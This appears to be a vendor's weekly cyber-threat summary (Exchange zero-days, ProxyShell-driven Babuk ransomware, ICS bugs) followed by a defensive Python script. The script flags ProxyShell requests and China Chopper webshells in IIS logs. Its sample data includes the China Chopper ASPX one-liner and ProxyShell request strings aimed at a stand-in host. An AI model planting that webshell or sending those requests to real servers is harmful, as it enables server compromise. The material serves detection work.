C5 Technology Weekly Threat Summary extract…
There’s been a fair bit of action this week, particularly in the IoT, OT, and ICS space. Healthcare is again a hot target, Microsoft has released its monthly patches, and Palo Alto’s GlobalProtect zero-day is causing concern.
Here’s this week’s executive summary:
- Microsoft fixes Exchange server zero-day
- Zoho password manager torched by Godzilla webshell
- Sunwater unaware of cyber-attack for nine months
- Babuk ransomware seen exploiting ProxyShell vulnerabilities
- Healthcare & OT systems exposed to attacks
- Two NPM packages with 22 million weekly downloads found backdoored
- Critical flaws in Philips TASY EMR could expose patient data
- Multiple BusyBox security bugs threaten embedded Linux devices
- 14 new vulnerabilities discovered in BusyBox
- New Android spyware poses Pegasus-like threat
- Palo Alto warns of zero-day bug in firewalls using the GlobalProtect portal VPN
- Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP edition appliance security update
- Nearly 100 TCP/IP stack vulnerabilities found during 18-month research project
General vulnerabilities: Microsoft, SAP, Adobe, Citrix, Samba, Apple, VMware
IoT, OT & ICS vulnerabilities: Philips, Schneider Electric NMC, Schneider Electric GUIcon, Siemens Nucleus NET, mySCADA, OSIsoft, OSIsoft PI Web API, Advantech, Siemens SIMATIC WinCC, Siemens Mendix, Siemens Mendix Studio Pro, Siemens SCALANCE W1750D, Siemens Nucleus RTOS-based APOGEE and TALON Products, Siemens NX OBJ Translator, Siemens Climatix POL909, Siemens SENTRON powermanager, WECON PLC Editor, Multiple Data Distribution Service (DDS) Implementations.
Microsoft’s November security updates contain fixes for fifty-five vulnerabilities, including six zero-day flaws. The one organizations should be most concerned about is CVE-2021-42298, a critical remote code execution bug in Microsoft Defender: an attacker can exploit it to run malicious code on vulnerable systems, and Microsoft’s own severity rating for it is Critical.
A newly observed Babuk ransomware campaign is targeting the ProxyShell vulnerabilities in Microsoft Exchange Server. Researchers spotted signs that the attackers use a China Chopper webshell for the initial compromise and then use that foothold to deploy Babuk. Tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, the issues were patched in April and May, with technical details made public in August. Researchers say that the Tortilla threat actor, active since July 2021, has started targeting the Exchange Server flaws. The infection chain features an intermediate unpacking module that is downloaded from pastebin.pl (a pastebin.com clone) and decoded in memory before the final payload is decrypted and executed. Because the fixes have been available since spring, any internet-facing Exchange server that is still unpatched should be checked for webshells and other post-exploitation artifacts, not just patched.
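As an added detection example (this is not code from the original summary or from the researchers’ report), the script below scans a constructed IIS access-log excerpt for the publicly documented ProxyShell path-confusion request shape (an `autodiscover.json?@host` Email parameter routed to the `/mapi/nspi` or `/powershell` backend), flags POSTs to `.aspx` files in directories commonly used for dropped webshells, and checks ASPX source for the classic China Chopper `eval(Request.Item[...], "unsafe")` one-liner. All log lines, hostnames, IPs and file names are constructed; the field order, directory list and regexes are assumptions and heuristics, not a complete detection.

```python
import re
from typing import Dict, List

# Assumed IIS W3C field order for the constructed sample below:
#   date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
IIS_FIELDS = ["date", "time", "s_ip", "method", "uri_stem", "uri_query",
              "port", "username", "c_ip", "user_agent", "status"]

# Constructed sample log (not real telemetry). Lines 2-3 mimic ProxyShell
# path-confusion requests; line 4 mimics a POST to a dropped webshell.
SAMPLE_IIS_LOG = """\
2021-11-10 09:14:02 10.0.0.5 GET /owa/auth/logon.aspx url=https%3a%2f%2fmail.example.test%2fowa 443 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) 200
2021-11-10 09:15:41 10.0.0.5 POST /autodiscover/autodiscover.json @evil.example/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.example 443 - 198.51.100.23 python-requests/2.26.0 200
2021-11-10 09:16:05 10.0.0.5 POST /autodiscover/autodiscover.json @evil.example/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dz&Email=autodiscover/autodiscover.json%3F@evil.example 443 - 198.51.100.23 python-requests/2.26.0 200
2021-11-10 09:20:12 10.0.0.5 POST /aspnet_client/system_web/update.aspx - 443 - 198.51.100.23 Mozilla/5.0+(Windows+NT+10.0) 200
"""

# Public ProxyShell indicators (CVE-2021-34473): the Email parameter carries
# "autodiscover.json?@<host>" and the query is prefixed with "@<host>/<backend>"
# so the front end proxies the request to /mapi/nspi (SID lookup) or
# /powershell (the CVE-2021-34523 / CVE-2021-31207 stages).
PROXYSHELL_QUERY = re.compile(
    r"(autodiscover\.json%3f@)|(^@[^/\s]+/(?:mapi/nspi|powershell|ews/exchange\.asmx)\b)",
    re.IGNORECASE,
)

# Heuristic: directories where ProxyShell webshells were commonly dropped.
# Assumed list; legitimate .aspx POSTs here are rare on a stock Exchange server.
WEBSHELL_DIRS = ("/aspnet_client/", "/owa/auth/")

# Classic China Chopper ASPX one-liner: eval(Request.Item["<key>"], "unsafe")
CHINA_CHOPPER_ASPX = re.compile(
    r"""eval\s*\(\s*Request\.Item\[\s*["'][^"']+["']\s*\]\s*,\s*["']unsafe["']\s*\)""",
    re.IGNORECASE,
)

# Constructed samples for the webshell check: the well-known one-liner and a benign page.
WEBSHELL_SAMPLE = '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>'
BENIGN_SAMPLE = '<%@ Page Language="C#" %><html><body>Hello</body></html>'


def parse_iis_line(line: str) -> Dict[str, str]:
    """Split one space-delimited W3C log line into the assumed field names."""
    parts = line.split()
    if len(parts) != len(IIS_FIELDS):
        raise ValueError(f"unexpected field count {len(parts)}: {line!r}")
    return dict(zip(IIS_FIELDS, parts))


def iter_records(log_text: str):
    for raw in log_text.splitlines():
        if raw and not raw.startswith("#"):   # skip W3C header lines
            yield parse_iis_line(raw)


def find_proxyshell_requests(log_text: str) -> List[Dict[str, str]]:
    """Return autodiscover.json requests whose query matches the ProxyShell shape."""
    hits = []
    for rec in iter_records(log_text):
        if (rec["uri_stem"].lower().endswith("/autodiscover/autodiscover.json")
                and PROXYSHELL_QUERY.search(rec["uri_query"])):
            hits.append({"time": rec["time"], "c_ip": rec["c_ip"], "query": rec["uri_query"]})
    return hits


def suspicious_aspx_posts(log_text: str) -> List[Dict[str, str]]:
    """Return POSTs to .aspx files inside the assumed webshell drop directories."""
    hits = []
    for rec in iter_records(log_text):
        stem = rec["uri_stem"].lower()
        if (rec["method"] == "POST" and stem.endswith(".aspx")
                and any(stem.startswith(d) for d in WEBSHELL_DIRS)):
            hits.append({"time": rec["time"], "c_ip": rec["c_ip"], "uri_stem": rec["uri_stem"]})
    return hits


def is_china_chopper(source: str) -> bool:
    """True if the ASPX source contains the China Chopper eval(..., "unsafe") pattern."""
    return CHINA_CHOPPER_ASPX.search(source) is not None


if __name__ == "__main__":
    for h in find_proxyshell_requests(SAMPLE_IIS_LOG):
        print("ProxyShell-shaped request:", h)
    for h in suspicious_aspx_posts(SAMPLE_IIS_LOG):
        print("POST to .aspx in webshell drop dir:", h)
    print("webshell sample flagged:", is_china_chopper(WEBSHELL_SAMPLE))
    print("benign sample flagged:", is_china_chopper(BENIGN_SAMPLE))
```

Run it as-is to see the two ProxyShell-shaped requests and the webshell POST from the same client IP; point `find_proxyshell_requests` and `suspicious_aspx_posts` at real `u_ex*.log` contents (adjusting `IIS_FIELDS` to the `#Fields:` header of your logs) and `is_china_chopper` at the contents of `.aspx` files under the Exchange web roots. Treat every hit as a lead for a full investigation rather than a verdict.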